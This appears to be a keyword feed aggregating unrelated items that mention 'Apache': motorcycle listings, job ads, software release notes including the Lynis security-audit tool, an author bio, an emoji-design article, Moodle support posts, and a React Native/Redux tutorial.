
           2012 TVS Apache RTR 33500 Kms
Price: ₹ 33,000, Model: Apache RTR, Year: 2012, KM Driven: 33,500 km,
2012 TVS Apache RTR 33500 Kms https://www.olx.in/item/2012-tvs-apache-rtr-33500-kms-ID1lMgQP.html
           2015 TVS Apache RTR 300000 Kms
Price: ₹ 40,000, Model: Apache RTR, Year: 2015, KM Driven: 3,00,000 km,
Apache RTR 160
Bought in November 2015
Yellow colour
Rear tyre changed recently
Interested? Ping me or send your number. https://www.olx.in/item/2015-tvs-apache-rtr-300000-kms-ID1lLJiP.html
           2011 TVS Apache RTR 47 Kms
Price: ₹ 22,000, Model: Apache RTR, Year: 2011, KM Driven: 47 km,
I want to sell my Apache RTR 160 DTS, dual disc. Call 79o4691193. Kicker spring problem. https://www.olx.in/item/2011-tvs-apache-rtr-47-kms-ID1lLCgh.html
          Senior Cloud/Web Infrastructure Engineer - RK Management Consultants, Inc. - Minneapolis, MN
Develop operational practice for technologies like Opscode Chef, multiple Public Cloud platforms, Basho Riak, Cassandra, Tomcat, Apache, Nginx, Sensu, Splunk,...
From Indeed - Tue, 19 Jun 2018 15:06:13 GMT - View all Minneapolis, MN jobs
          Administrative Dept Clerk II - Apache Corp - Canadian, TX
Manage calendars, answer phones and screen to control interruptions. Ensures arrangements for meetings and conference calls, including coordinating logistics,...
From Apache Corp - Mon, 09 Jul 2018 13:02:23 GMT - View all Canadian, TX jobs
          How To Install SBT and Scala on Ubuntu Server

Here are the steps on how to install SBT and Scala on Ubuntu Server. sbt is a build tool for Scala and Java projects, similar to Apache Maven and Apache Ant.
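Condensed, the procedure amounts to adding the official sbt apt repository and installing the packages. A minimal sketch, assuming a stock Ubuntu server with sudo access; the repository line follows the sbt documentation, and the GPG key import is elided (see scala-sbt.org for the current key):

```shell
# sbt and Scala both run on the JVM, so install a JDK first
sudo apt-get update
sudo apt-get install -y default-jdk

# add the official sbt apt repository (import its signing key per scala-sbt.org)
echo "deb https://repo.scala-sbt.org/scalasbt/debian all main" | sudo tee /etc/apt/sources.list.d/sbt.list
sudo apt-get update
sudo apt-get install -y sbt

# the first run downloads sbt's own dependencies and prints the version
sbt sbtVersion
```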

The post How To Install SBT and Scala on Ubuntu Server appeared first on The Customize Windows.


          Lynis 2.6.6 - Security Auditing Tool for Unix/Linux Systems

We are excited to announce this major release of the auditing tool Lynis. Several big changes have been made to core functions of Lynis. These changes are the next step in the simplification improvements we have been making. There is a risk of breaking your existing configuration.

Lynis is an open source security auditing tool. It is used by system administrators, security professionals, and auditors to evaluate the security defenses of their Linux and Unix-based systems. Because it runs on the host itself, it performs more extensive security scans than network-based vulnerability scanners.

Supported operating systems

The tool has almost no dependencies, so it runs on almost all Unix-based systems and versions, including:
  • AIX
  • FreeBSD
  • HP-UX
  • Linux
  • Mac OS
  • NetBSD
  • OpenBSD
  • Solaris
  • and others
It even runs on systems like the Raspberry Pi and several storage devices!

Installation optional

Lynis is lightweight and easy to use. Installation is optional: just copy it to a system, and use "./lynis audit system" to start the security scan. It is written in shell script and released as open source software (GPL).

How it works

Lynis performs hundreds of individual tests to determine the security state of the system. The security scan itself consists of a set of steps, from initialization of the program up to the report.

Steps
  1. Determine operating system
  2. Search for available tools and utilities
  3. Check for Lynis update
  4. Run tests from enabled plugins
  5. Run security tests per category
  6. Report status of security scan
Besides the data displayed on the screen, all technical details about the scan are stored in a log file. Any findings (warnings, suggestions, data collection) are stored in a report file.
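The steps above map onto a short session like the following sketch (file locations are the usual Lynis defaults and may differ on your system):

```shell
# copy or clone Lynis onto the host; no installation is required
cd /opt/lynis

# run a full audit of the local system (running as root yields the most complete scan)
sudo ./lynis audit system

# technical details of the scan go to the log file,
# findings (warnings, suggestions, collected data) to the report file
less /var/log/lynis.log
less /var/log/lynis-report.dat
```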

Opportunistic Scanning

Lynis scanning is opportunistic: it uses what it can find.
For example, if it sees you are running Apache, it will perform an initial round of Apache-related tests. If, during the Apache scan, it discovers an SSL/TLS configuration, it performs additional auditing steps on that configuration and collects any discovered certificates so they can be scanned later as well.

In-depth security scans

By performing opportunistic scanning, the tool can run with almost no dependencies. The more it finds, the deeper the audit will be. In other words, Lynis will always perform scans which are customized to your system. No audit will be the same!

Use cases

Since Lynis is flexible, it is used for several different purposes. Typical use cases for Lynis include:
  • Security auditing
  • Compliance testing (e.g. PCI, HIPAA, SOx)
  • Vulnerability detection and scanning
  • System hardening

Resources used for testing

Many other tools use the same data files for performing tests. Since Lynis is not limited to a few common Linux distributions, it combines tests from public standards with many custom tests not found in any other tool.
  • Best practices
  • CIS
  • NIST
  • NSA
  • OpenSCAP data
  • Vendor guides and recommendations (e.g. Debian, Gentoo, Red Hat)

Lynis Plugins

Plugins enable the tool to perform additional tests. They can be seen as an extension (or add-on) to Lynis, enhancing its functionality. One example is the compliance checking plugin, which performs specific tests only applicable to a particular standard.

Changelog
Upgrade note
## Lynis 2.6.6

### Improvements
* New format of changelog (https://keepachangelog.com/en/1.0.0/)
* KRNL-5830 - improved log text about running kernel version

### Fixed
* Under some conditions, no hostid2 value was reported
* Solved 'extra operand' issue with tr command


Download Lynis 2.6.6

          Pickleball
(South 8th and Apache streets). Loaner paddles are available if you don’t have one.
          WebPanel install
Need ISPConfig web panel installed on an OpenVZ plan that I have. Full software etc. can be found at ISPconfig.org. Can be done on Debian 8, Ubuntu 14, or CentOS 7. No particular difference to me. Payment... (Budget: $10 - $30 USD, Jobs: Apache, Debian, Linux, PHP, Ubuntu)
          Apache Tomcat x64 9.0.10
An open source implementation of the Java Servlet and JavaServer Pages technologies
          Apache Tomcat 9.0.10
An open source implementation of the Java Servlet and JavaServer Pages technologies
          ArangoDB 3.3.9.4 released: a distributed native multi-model database

ArangoDB 3.3.9.4 has been released. ArangoDB is an open-source, distributed, native multi-model database (Apache 2 license).

Philosophy

With one engine, one query language, and one database technology supporting multiple data models, it aims to maximize project flexibility, simplify the technology stack, simplify database operations, and reduce operational costs.

As a native multi-model database, ArangoDB combines three data models in one store: graph, document, and key/value. Its flexibility comes from a unified core and a unified query language, AQL (ArangoDB Query Language), which covers all three models and even allows mixing them in a single query.

Users can therefore combine multiple data models within a single query, without "switching" between models or transferring data between them, and all three models scale horizontally. Thanks to this natively integrated multi-model design, ArangoDB is well suited to building high-performance applications.

For details of this update, see the release page or the ChangeLog.

Download:


          Need help with a Bug Fix for an Apache Cordova Smartphone App (also future enhancements/maintenance)
I have an iOS/Android smartphone app that was built using Apache Cordova and Visual Studio. I need help with an iOS-only bug fix on the existing version and am also looking for a long term relationship for... (Budget: $15 - $25 USD, Jobs: Android, iPhone, Mobile App Development, PhoneGap, PHP)
          Spirit of Prophecy: Paranormal and Sci-Fi Crime by JJ Hughes
J.J. Hughes was born in Cottingley, a quaint little village in West Yorkshire, UK. Her grandfather Arthur Shackleton was related to Sir Ernest Shackleton, the polar explorer, though the furthest granddad perhaps travelled was up the road to the men-only social club; he rose early, worked long and hard, and filled the house with the amazing aromas of freshly baked cakes and bread, so he could hardly be kneading dough and adventuring at the same time. Mouths always have to be fed, don't they, and baking is hard, hot, thirsty work. Her parents, Margaret and Arnold Simpson, lived with her grandfather above the shop; the house was large, old and rambling, with a proliferation of attics and spider-filled cellars, if you cared to look closely. Generally the author did not, preferring to spend her time playing catch, hopscotch and the like in the cobbled streets, catching minnows in the beck (a small stream) or swimming beneath the waterfall famous for fairies, after two local girls, Elsie Wright and Frances Griffiths, photographed them in 1917 (or did they?). The photos later proved to be fakes, and the story inspired the movie 'Fairy Tale: A True Story', starring Peter O'Toole as Sir Arthur Conan Doyle, the creator of Sherlock Holmes, who was taken in by the hoax. Then again, to this day J.J. Hughes believes in elves, fairies, mermaids, unicorns and all things Elemental and Other Worldly. The author's favourite box set: Game of Thrones. Favourite movies: Star Wars, Independence Day, The Arrival... Spirit of Prophecy... (ha ha, calling all film directors?). What are we without an open heart and a mind fired by imagination, after all?
Nearby Cottingley is the author's favourite place: think Hovis ads, steam trains and cobbled streets. Try Tetley's real ale in Haworth, famous for the wild moors and the Brontë sisters, who wrote 'Wuthering Heights' and 'Jane Eyre', two of her favourite novels, along with 'Pride and Prejudice' (Jane Austen) and 'Gone with the Wind' (Margaret Mitchell). Feisty heroines and fill-their-boots heroes win hands down every time. From her early teens J.J. Hughes was a passionate horse owner and regularly competed in affiliated junior showjumping competitions. In its day West Yorkshire produced many of England's top show jumpers; true Northern grit, we guess? Or, where there's horse muck, there's brass! In her debut novel 'Spirit of Prophecy' there is an Olympic gold medal event horse called Gothic (after Gothic novels, a much-loved genre) and his feisty owner and rider Juliet Jermaine. At 17 the author wrote a humorous pony novel, bashed out on a neon-orange little typewriter (thank heavens for word processors and spell checking, and goodbye Tippex and White-Out; some things disappear and are not mourned or missed). J.J. Hughes was blessed and inspired by two incredible English teachers, Paddy and Vanda, then a husband-and-wife team; thanks to Paddy, a brilliant photographer (a passionate Irishman with a big beard, bowler hat and rather eccentric black flowing cape), she developed a lifelong love of film as a medium. Later, after leaving school, she studied English/American Literature with Film Studies at the University of East Anglia (UEA), Norwich, and subsequently took an MA in Creative Writing at Surrey University. Career-wise, after a year or so teaching English abroad, she accidentally landed a job at an investment bank in the City of London; how this came about, let alone endured, is still a mystery to all concerned.
Later, after three amazing children came along, she quit the City, headed for the Surrey Hills, trained as a Life Coach and Passion Test Facilitator, and went on to co-author a No. 1 best-selling spiritual self-help book called 'Inspired by the Passion Test'; in the vein of giving back, all profits go to charity. There is more about the green energy of giving money in her next planned self-help book, 'Pursuing the Passion', which is about how to get clear on your life purpose and harness your passions and skills to make money and earn extra income doing what you love. J.J. Hughes is passionate about horses, the paranormal, New Age spirituality, self-development, travel, karma and reincarnation, crime and justice, in no particular order. She has had numerous prophetic premonitions, usually about death, which so far, despite a few close shaves, she has escaped (pinch test just to check she's still alive: yes, that hurt!). She came to believe in reincarnation in her mid-twenties when her old horse Red made a reappearance, this time as a palomino called Hooray Henry. Sometimes, when we don't get the ending right or learn the lessons, they boomerang right back and bite us on the ass; quite literally in Red's case, as he was one mean S.O.B., a bad-tempered, hot-headed sort who would not only bite the devoted hay-bearers but kick them on the way out too! Now, having survived the loving attentions of various equines, and a serious riding accident requiring airlifting into A&E plus a long stint in a wheelchair, the author has finally hung up her spurs, as it were. She is an experienced coach, mentor, Passion Test Facilitator and Soul Re-alignment specialist, and the topics currently piquing her interest are spirituality and science, where she hopes to see more interdisciplinary co-operation to solve the great remaining mysteries of life, including man's origins. On that note she is keen on panspermia, the theory that life was seeded from outer space.
She's mighty curious about aliens (when will they come out of the closet?) and about the ethical, moral and other massive implications of A.I. and robots. Will the FANGs (Facebook, Amazon, Netflix, Google and their sort) colonise Mars? Will we get all the plastic out of the seas? Will humanity swap hugs and harmony for mass destruction? Guess where my sequel novel is going: it starts with psychic CID officer Rosetta Barrett and Juliet Jermaine (the victim) packing up camp on the Apache Indian Reservation, where they left off in 'Spirit of Prophecy', and heading out on a road trip along the Alien Highway towards Area 51. Happy UFO spotting, y'all. The author would love to connect with her readers: get in touch via her website, www.moneymagnet.global, or leave a review here on Amazon; she'd love to hear your feedback to improve her work and find out what's rocking your boat, spinning your wheels, and so forth. Love and Light from J.J. Hughes x
          Stateful Stream Processing with Apache Flink
In the first part of this series of articles on Flink we described stream processing in general and Apache Flink in particular; in this second part we look at how to write an Apache Flink application in practice.

          Why do emoji look different on different platforms, and sometimes show up as unrecognizable characters?
In June this year, the latest batch of 157 emoji was formally added to Unicode 11.0, and they will gradually appear on different phones and apps. But these new emoji still need to be reworked by each platform's designers before we see them. As the world's most widely used mobile operating system, Android will influence more than a billion people with its redesigned emoji.

Recently, Jennifer Daniel, Google's emoji design director for the Android platform, gave an interview to CNBC describing the philosophy behind Android's emoji redesigns.

Every emoji is an extension of the brand

Daniel does not decide which symbols become emoji; her job is to make emoji more "Google".

"I think of every emoji as an extension of the platform's brand."

Many platforms reinterpret emoji according to their own design language and brand style. Take the eye-roll emoji as an example: Apple is obsessed with design, so its version is more three-dimensional, with carefully crafted gradients and shadows; Microsoft's version has thick black outlines, presumably to stand out clearly against text; Twitter, a social platform that began with short messages, keeps its emoji very simple, with essentially no shadows or gradients; Google's are more relaxed and cartoonish.

Samsung announced an emoji update in February this year. Before the update, in Samsung Experience 8.5, its emoji were relatively complex and heavily anime-styled, and different emoji were drawn at different angles and orientations, so people often misread them. In version 9.0, the emoji became much simpler and more consistent.

On Google's style, Daniel says: "When you think of our products, we want you to smile, so we try to make our emoji more light-hearted, which is why they are more cartoonish."

Every emoji is a Unicode character. Emoji worldwide are voted on and published by the Unicode Consortium, and people everywhere can submit emoji proposals to the Consortium. The Consortium's emoji specification only defines the semantics of a character; the Emojipedia website then describes each emoji, and everyone is free to design artwork based on their understanding of that description.

The values embedded in emoji design

In June, Emojipedia published the list of candidate emoji for Unicode 12.0, which includes new emoji such as an axe, a flamingo and a diving mask, as well as emoji for people with disabilities and emoji specific to India. Whether these candidates end up in people's hands depends on whether they are approved.

Around March every year, once the new emoji are announced, the designers who reinterpret and redesign them, such as Daniel, get busy. She has to consider usage scenarios ("In what situations will users use the emoji we design?") as well as details such as "which lines on a frisbee add a sense of motion".

However, when emoji redesigned by different platforms are used across platforms, they often break. For example, if an iPhone user posts a relatively rare emoji, some friends on Android phones will see only an unrecognizable character.

Daniel explains that this is because the platforms do not communicate much with each other when reworking emoji. Although they all sit on the Unicode Consortium's committees, they mostly discuss emoji text, experience and file size, not each other's designs.

It must be said that each vendor's designs also reveal its values.

In recent years, for example, Google and Apple have both pushed for more diverse emoji. When Google released the Android P beta in early June, it updated many gender-neutral emoji, and combinations such as "parents" and "lovers" no longer default to a man and a woman.

As early as 2015, Apple added skin-tone options in iOS and OS X, along with same-sex family combinations.

Copyright is the real reason emoji have so many faces

Beyond each platform's own values and design style, the more important reason a single code point has so many faces is the copyright of emoji designs. This is something Daniel, Android's emoji design director, did not say much about in her CNBC interview.

In fact, the copyright details of a single emoji can involve multiple parties' interests:

The emoji's official name belongs to the Unicode specification, i.e. the Unicode Consortium;
the copyright of its descriptive text belongs to the website emojipedia.org;
the copyright of its graphic design belongs to its creator or company.

Apple was ahead of its time in designing and popularizing emoji, which is why its set, known as "Apple Color Emoji", became popular worldwide; its copyright belongs to Apple. Apple users can use this emoji font within the system, but have no right to install it on non-Apple devices.

Google's Android emoji, by contrast, are released under the Apache License 2.0 open-source license, but many people never warmed to their design and remain more familiar with Apple's set.

So vendors with a sizeable user base, such as Twitter, Facebook, Microsoft and Samsung, design their own emoji versions to avoid copyright risk.

As a result, every vendor is wedded to its own emoji set and keeps revising and iterating it over time. For us users, the experience is that, in communication across apps and systems, emoji that were meant to help people express themselves become unrecognizable characters.

As of June, 2,823 emoji have passed official review, and twenty years have passed since the first batch of 177 emoji was designed in 1998. They were meant to be a universal language for global social media; today they look more like a demolished Tower of Babel.

This article is republished with permission from ifanr (愛範兒).

          Middleware Engineer-II (Middleware Senior) - Mainstreet Technologies, Inc - McLean, VA
Middleware Engineer-II (Middleware Senior) Job Requirements: Required Skills: 3 – 5 years of Apache administration experience 5 – 7 years of WebLogic...
From Mainstreet Technologies, Inc - Thu, 17 May 2018 04:46:56 GMT - View all McLean, VA jobs
          Middleware Engineers - Mainstreet Technologies, Inc - McLean, VA
Middleware Engineer Professional Required Technical Skills Bachelor’s Degree · 3 – 5 years of Apache administration experience · 5 – 7 years of WebLogic...
From Mainstreet Technologies, Inc - Mon, 14 May 2018 10:39:11 GMT - View all McLean, VA jobs
          Home-Based Satellite TV Technician/Installer - DISH Network - Apache, OK
Must possess a valid driver's license in the State you are seeking employment in, with a driving record that meets DISH's minimum safety standard.... $15 an hour
From DISH - Mon, 09 Jul 2018 19:17:49 GMT - View all Apache, OK jobs
          LEAD SALES ASSOCIATE-FT - Dollar General - Apache, OK
Occasional or regular driving/providing own transportation to make bank deposits, attend management meetings and travel to other Dollar General stores....
From Dollar General - Fri, 27 Apr 2018 11:14:28 GMT - View all Apache, OK jobs
          Personal Care Aide - May's Plus, Inc. - Apache, OK
Has a telephone and dependable transportation, valid driver’s license and liability insurance. Provides assistance with non-technical activities of daily living...
From May's Plus, Inc. - Tue, 17 Apr 2018 14:05:28 GMT - View all Apache, OK jobs
          SMTP Gmail delay while sending emails
by Vytautas Krasauskas.  

Hello,

Moodle version 3.5.1

Ubuntu 18.04 digitalocean droplet

standard Apache/MySQL/PHP install from the repos

This is a setup restored from a different host. Email has never been configured before, so I cannot check whether it previously worked.

cronjob is running

smtp host: smtp.gmail.com:587 (same behaviour as without the port being specified)

smtp security: tls

smtp auth type: any, they all behave the same

username: appropriate username

password: app specific password

smtp limit: 1

captcha thing done


At first I was testing using the forgotten password function, but later installed the mail test plugin. The behaviour is the same: the email gets delivered, but it takes about 2.5 to 3 minutes to arrive. In the meantime, the page keeps loading. Clicking any other internal link does not work; the page just keeps loading until the email eventually gets sent. Same behaviour with new user registration. This makes me want to tear my hair out.
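For reference, one way to check from the server whether the delay sits at the network level rather than inside Moodle (a diagnostic sketch, assuming the host and port configured above):

```shell
# time a raw SMTP/TLS handshake to Gmail from the Moodle host;
# if this also stalls for minutes, the delay is network- or DNS-level, not Moodle's
time openssl s_client -starttls smtp -crlf -connect smtp.gmail.com:587 -quiet < /dev/null
```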

Any suggestions?

Sincerely yours.


          Atto Editor 3.2.9
by Jane Eckert.  

I was working with the paragraph styles in the Atto editor and have found inconsistencies compared with v3.1.9.

Chrome and Firefox
Pre-formatted style no longer puts a shaded box around the wording.

Chrome
Table text cannot be changed back to paragraph after a different style is selected.

Firefox
Table text cannot be formatted (the font remains the same no matter what paragraph style is selected).

We have instructors that use both the pre-formatted style and tables in the Atto editor and I'm sure I'll get questions. Any insight would be greatly appreciated.

Our system setup:
OS - RedHat Linux 7.5
Web server - Apache 2.4
Database - PostgreSQL 9.2
PHP - 5.4



          Systems Administrator / Systems Analyst - Centre de la sécurité des télécommunications Canada - Ottawa, ON
Commercial and open-source software (Apache, Salt, Ansible, IBM Tivoli). Job summary....
From Workland - Thu, 14 Jun 2018 19:14:54 GMT - View all Ottawa, ON jobs
          Systems Administrator / Systems Analyst - Centre de la sécurité des télécommunications Canada - Ottawa, ON
Open source and commercial software (Apache, Salt, Ansible, IBM Tivoli). Please apply online via our website:....
From Workland - Thu, 14 Jun 2018 19:14:54 GMT - View all Ottawa, ON jobs
          XAMPP 7.2.7-0
An easy-to-install Apache distribution for Linux, Solaris, and Windows. 2018-07-10
          Geospatial Corporation Provides Pipeline Data Collection and Mapping Solutions in Permian Basin of West Texas for Global Energy Company

Company Plans New Operations Hub in Midland, Texas

PITTSBURGH, PA / ACCESSWIRE / July 10, 2018 / Geospatial Corporation (OTCQB: GSPH) has successfully completed the accurate 3D mapping of several newly installed pipelines in the Permian Basin of west Texas for a major global energy company. To better serve the demand for accurate and economical pipeline location and mapping, Geospatial is opening a permanent operations center in Midland, Texas to serve the central states region encompassing Texas, New Mexico, Colorado and Louisiana.

Mark Smith, CEO of Geospatial Corporation said, "Our data acquisition techniques and software are extremely accurate and economical. We provide data for our client's systems of record that is traceable, verifiable and complete."

The Permian Basin of West Texas

The Permian Basin of West Texas and southeast New Mexico is known as one of the most prolific oil and gas regions in the country and has abundant supplies. Operators like Pioneer Natural Resources (PXD), Chevron (CVX), ExxonMobil (XOM), Apache (APA), Occidental Petroleum (OXY) and Concho Resources (CXO) have announced multi-billion-dollar direct investments in the region to increase production. According to a recent report in Seeking Alpha, "there's just not enough space in existing pipelines currently for the gas that is being marketed." Smith added, "As our clients invest in new pipeline infrastructure, it is an ideal time to gather accurate locational pipeline data."

The need to manage our underground infrastructure is being driven by a multitude of timely factors. Under new regulations, the oil and gas industry is charged with knowing everything about its pipeline infrastructure from the wellhead to the home. These requirements encompass every part of the nation's massive energy pipeline infrastructure, across upstream, midstream and downstream.

About Geospatial Corporation

Geospatial Corporation delivers Locational 3D Data, Information Technology, Software and Program Management Services that provide a scalable solution to improve our clients' ability to securely, accurately and economically map and manage our global underground infrastructure including energy pipelines, sewers, water lines, conduits, and cables.

Forward Looking Statements

This press release contains forward-looking information within the meaning of the Private Securities Litigation Reform Act of 1995, Section 27A of the Securities Act of 1933 and Section 21E of the Securities Exchange Act of 1934, and is subject to the safe harbor created by those laws. These forward-looking statements, if any, are based upon a number of assumptions and estimates that are subject to significant uncertainties that involve known and unknown risks, many of which are beyond our control and are not guarantees of future performance. Actual outcomes and results could materially differ from what is expressed, implied, or forecasted in any such forward-looking statements, and any such difference may be caused by risk factors listed from time to time in the Company's news releases and/or its filings, or as a result of other factors.

Contact Info

Mark Smith/CEO
Geospatial Corporation
Mark.Smith@GeospatialCorp.com
www.GeospatialCorporation.com
www.GeoUnderground.com
O - 724-353-3400

SOURCE: Geospatial Corporation

ReleaseID: 504903


          From React Native to Microservices: Putting a Full-Stack Solution into Practice

Poplar is a social-themed content community, but it does not aim to be a community itself; rather, it provides an open-source base kit that can be quickly extended. The front end is built with React Native and Redux; the back end consists of Spring Boot, Dubbo and Zookeeper microservices exposing a consistent API.

https://github.com/lvwangbeta/Poplar

Although React Native offers a cross-platform solution, it does not overly compromise on performance or development efficiency. Developers with a JS and CSS background will not find it hard to pick up, though the JSX syntactic sugar takes some getting used to, and whether you like having the DOM structure, styles and JS logic written together is a matter of taste; it is, however, a good way of forcing you to decouple into modules. Because data flow in React components is one-way, a troublesome problem arises: components struggle to communicate efficiently. Communication between two deeply nested sibling nodes in particular becomes extremely complex, polluting every ancestor node with passed-through props and making maintenance very expensive. For this reason Poplar adopts a Redux architecture to manage application state centrally.

Modularity

The app consists of five base pages: the feed page (MainPage), the explore page (ExplorePage), the account detail page (MinePage), the post creation page (NewFeed), and the login/registration page (LoginRegPage). Pages are in turn composed of base components, such as the feed list, feed detail, comments, tags and albums. All interaction with the server goes through the API layer.

The bottom of each page is a TabNavigator containing five TabNavigator.Item entries, one per base page. If the user is not logged in, tapping the home or new-post tab brings up the login/registration page.

Redux

Redux was not adopted to follow a trend; Flux was proposed as early as 2014. Redux was adopted out of necessity: Poplar's component structure is not especially complex, but it is deeply nested, and the feed must be accessible both logged in and logged out, which calls for a single state manager to coordinate communication and state updates between components. Redux solves exactly that problem.

Rather than a dry walkthrough of Redux's architectural model, let's use Poplar's login state as a simple example of how Redux is used in the project.

Poplar uses the React-Redux library, an implementation of the Redux architecture for React.

1. Scenario

When the user is not logged in, tapping the feed page pops up the login/registration page; after a successful login or registration the page slides away and the feed is refreshed. The App component in the figure below is the common parent of the login page and the feed page, which are siblings.

This requirement looks simple, but without Redux it is awkward to implement in React and produces a lot of redundant call plumbing.

First, how would this flow be implemented without Redux?

When the first tab-bar item, the feed tab, is tapped, we must check whether the user is logged in, for example by checking for a locally stored token or some other credential. If not, we have to update the App component's state and pass that change down to LoginPage via props; LoginPage, on receiving new props, updates its own state to {visible: true} to show itself. If the user then logs in successfully, LoginPage sets its state to {visible: false} to hide itself and invokes the callback App passed down, telling its parent that the user has logged in. Count it up: this single exchange between two components already costs one props variable, one props callback and two state updates, and at this point we have only told App that the application is now logged in; the user's feed has not been refreshed, because MainPage does not yet know. Since React's data flow is one-way, the only way to make the lower component update is to pass a changed props attribute, adding yet another props cost; MainPage then updates its associated state and refreshes itself to fetch the feed, finally completing one post-login display of MainPage. As this analysis shows, moving from logged-out to logged-in forces Poplar through a lot of redundant but unavoidable parameter passing, because the sibling nodes LoginPage and MainPage cannot simply tell each other their state and need the App parent as a bridge that relays messages up and then back down.

Now let's see how the same flow works after introducing Redux:

Again, the user taps the home tab while logged out. With Redux, Poplar has already initialized a global login state {status: 'NOT_LOGGED_IN'} for the application. When the user logs in successfully, this state is updated to {status: 'LOGGED_IN'}. LoginPage is bound to this state, so Redux immediately notifies it to update its own state to {visible: false}. App is also bound to the same Redux-managed global state, so it likewise receives the {status: 'LOGGED_IN'} notification and can simply hide LoginPage and show MainPage after login. Simple and almost magical: no layer-by-layer parameter passing at all. A component that wants some piece of global state just binds to it, and Redux notifies it immediately.

2. Implementation

Let's walk through the React-Redux implementation of this scenario with the actual code:

connect

In the App component, the connect method wraps the UI component in a Redux container component. You can think of it as a bridge between the UI component and Redux, binding the store to the component.

import {showLoginPage, isLogin} from  './actions/loginAction';
import {showNewFeedPage} from './actions/NewFeedAction';

export default connect((state) => ({
  status: state.isLogin.status, // login status
  loginPageVisible: state.showLoginPage.loginPageVisible
}), (dispatch) => ({
  isLogin: () => dispatch(isLogin()),
  showLoginPage: () => dispatch(showLoginPage()),
  showNewFeedPage: () => dispatch(showNewFeedPage()),
}))(App)

The first argument to connect is the mapStateToProps function, which establishes a mapping from the store's data to the UI component's props. Whenever the store updates, mapStateToProps is called; it returns an object mapping the UI component's props to store data. In the code above, mapStateToProps receives state as an argument and returns a mapping from the UI component's login status, and from the login page's visibility, to the corresponding state in the store. The App component's state is thus bound to the Redux store.

The second argument, the mapDispatchToProps function, binds actions to the component as props and returns a mapping from the UI component's props to Redux actions. In the code above, the App component's isLogin, showLoginPage and showNewFeedPage props are mapped to Redux actions. Calling isLogin actually calls store.dispatch(isLogin()); dispatch routes the action to the reducers.

Provider

How does the state in connect get passed in? React-Redux provides the Provider component, which lets container components access the state.

import React, { Component } from 'react';
import { Provider } from 'react-redux';
import configureStore from './src/store/index';

const store = configureStore();

export default class Root extends Component {
  render() {
    return (
      <Provider store={store}>
        <Main />
      </Provider>
    )
  }
}

In the code above, Provider wraps the root component, so all of App's child components can access the state by default.

Action & Reducer

The binding between components and Redux's global state is done, but how does state actually flow? How does the login state propagate through the whole application?

This is where Redux actions and reducers come in. Actions receive events from the UI components; reducers respond to actions and return a new store, triggering updates in the UI components bound to that store.

export default connect((state) => ({
  loginPageVisible: state.showLoginPage.loginPageVisible,
}), (dispatch) => ({
  isLogin: () => dispatch(isLogin()),
  showLoginPage: (flag) => dispatch(showLoginPage(flag)),
  showRegPage: (flag) => dispatch(showRegPage(flag)),
}))(LoginPage)

this.props.showLoginPage(false);
this.props.isLogin();

In this login scenario, as the code above shows, LoginPage binds its props to the store and the actions. On a successful login it calls the showLoginPage(false) action to hide itself, and the reducer receives the dispatched action and updates the store state:

//Action
export function showLoginPage(flag=true) {
  if(flag == true) {
    return {
      type: 'LOGIN_PAGE_VISIBLE'
    }
  } else {
    return {
      type: 'LOGIN_PAGE_INVISIBLE'
    }
  }
}

//Reducer
export function showLoginPage(state=pageState, action) {
  switch (action.type) {
    case 'LOGIN_PAGE_VISIBLE':
      return {
        ...state,
        loginPageVisible: true,
      }
    case 'LOGIN_PAGE_INVISIBLE':
      return {
        ...state,
        loginPageVisible: false,
      }
    default:
      return state;
  }
}

At the same time, the isLogin action is dispatched to update the application's global state to logged-in:

//Action
export function isLogin() {
  return dispatch => {
      Secret.isLogin((result, token) => {
        if(result) {
          dispatch({
            type: 'LOGGED_IN',
          });
        } else {
          dispatch({
            type: 'NOT_LOGGED_IN',
          });
        }
      });
  }
}

//Reducer
export function isLogin(state=loginStatus, action) {
    switch (action.type) {
      case 'LOGGED_IN':
        return {
          ...state,
          status: 'LOGGED_IN',
        }
      case 'NOT_LOGGED_IN':
        return {
          ...state,
          status: 'NOT_LOGGED_IN',
        }
      default:
        return state;
    }
}
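The two reducers above each manage one slice of the store; in a real app they are composed into a single root reducer (e.g. with Redux's combineReducers, plus thunk middleware for the async isLogin action creator). As a minimal, framework-free sketch of what that composition does (the hand-rolled rootReducer below is illustrative, not the project's actual code):

```javascript
// Minimal sketch of how two slice reducers compose into one root reducer.
// The real project would use Redux's combineReducers plus redux-thunk for
// the async isLogin action creator; here we hand-roll it to show the idea.

const pageState = { loginPageVisible: false };
const loginStatus = { status: 'NOT_LOGGED_IN' };

function showLoginPage(state = pageState, action) {
  switch (action.type) {
    case 'LOGIN_PAGE_VISIBLE':
      return { ...state, loginPageVisible: true };
    case 'LOGIN_PAGE_INVISIBLE':
      return { ...state, loginPageVisible: false };
    default:
      return state;
  }
}

function isLogin(state = loginStatus, action) {
  switch (action.type) {
    case 'LOGGED_IN':
      return { ...state, status: 'LOGGED_IN' };
    case 'NOT_LOGGED_IN':
      return { ...state, status: 'NOT_LOGGED_IN' };
    default:
      return state;
  }
}

// Hand-rolled equivalent of combineReducers({ showLoginPage, isLogin }):
// each action is passed to every slice reducer, and the results are
// reassembled into one state tree.
function rootReducer(state = {}, action) {
  return {
    showLoginPage: showLoginPage(state.showLoginPage, action),
    isLogin: isLogin(state.isLogin, action),
  };
}

let state = rootReducer(undefined, { type: '@@INIT' });
state = rootReducer(state, { type: 'LOGGED_IN' });
state = rootReducer(state, { type: 'LOGIN_PAGE_INVISIBLE' });
console.log(state.isLogin.status);                 // 'LOGGED_IN'
console.log(state.showLoginPage.loginPageVisible); // false
```

This is why connect's mapStateToProps reads nested paths such as state.showLoginPage.loginPageVisible: each slice reducer owns one key of the state tree.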

Because the App component is already bound to this global login status, it receives the update once the reducer changes it and re-renders itself; at that point MainPage is rendered:

const {status} = this.props;
return (
  <TabNavigator>
    <TabNavigator.Item
      selected={this.state.selectedTab === 'mainTab'}
      renderIcon={() => <Image style={styles.icon} 
                         source={require('./imgs/icons/home.png')} />}
      renderSelectedIcon={() => <Image style={styles.icon} 
                          source={require('./imgs/icons/home_selected.png')} />}
      onPress={() => {
                      this.setState({ selectedTab: 'mainTab' });
                      if(status == 'NOT_LOGGED_IN') {
                        showLoginPage();
                      }
                  }
               }
    >
	  {/* the global status has changed from NOT_LOGGED_IN to LOGGED_IN */}
      {status == 'NOT_LOGGED_IN'?<LoginPage {...this.props}/>:<MainPage {...this.props}/>}

framework

Project Build & Development

1. Project Structure

project

poplar, the top-level Maven project, carries no business functionality or code of its own; it provides base pom dependency management for the modules below it
poplar-api plays two roles: as the API gateway it receives and routes channel-layer requests, and as the microservice consumer it orchestrates provider services to complete call chains
